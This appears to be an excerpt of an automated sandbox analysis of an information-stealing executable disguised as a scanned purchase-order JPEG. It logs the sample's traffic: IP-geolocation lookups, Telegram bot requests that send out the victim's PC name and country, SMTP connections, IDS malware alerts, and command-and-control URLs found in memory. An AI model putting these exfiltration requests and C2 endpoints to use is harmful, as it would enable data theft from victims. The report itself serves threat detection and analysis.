                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2025/10/2024%20/%2019:19:15%0D%0ACountry%20Name:%20United%20States%0D%0A[%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2025/10/2024%20/%2020:37:54%0D%0ACountry%20Name:%20United%20States%0D%0A[%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: RELIABLESITEUS RELIABLESITEUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49749 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49735 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49743 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49751 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49761 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49767 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49771 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49775 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.4:49779 -> 104.243.33.38:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2025/10/2024%20/%2019:19:15%0D%0ACountry%20Name:%20United%20States%0D%0A[%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2025/10/2024%20/%2020:37:54%0D%0ACountry%20Name:%20United%20States%0D%0A[%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: mail.kafs.co.ug
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 25 Oct 2024 07:18:19 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 25 Oct 2024 07:18:24 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, HJnkiZjAPsec.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, HJnkiZjAPsec.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kafs.co.ug
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kafs.co.ugd
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.kafs.co.ug
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.kafs.co.ugd
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, HJnkiZjAPsec.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4129429491.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4144722830.0000000006328000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4145363700.000000000628D000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4129499108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0#
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4129429491.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4144722830.0000000006328000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4145363700.000000000628D000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4129499108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1732669565.0000000003490000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1779228796.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
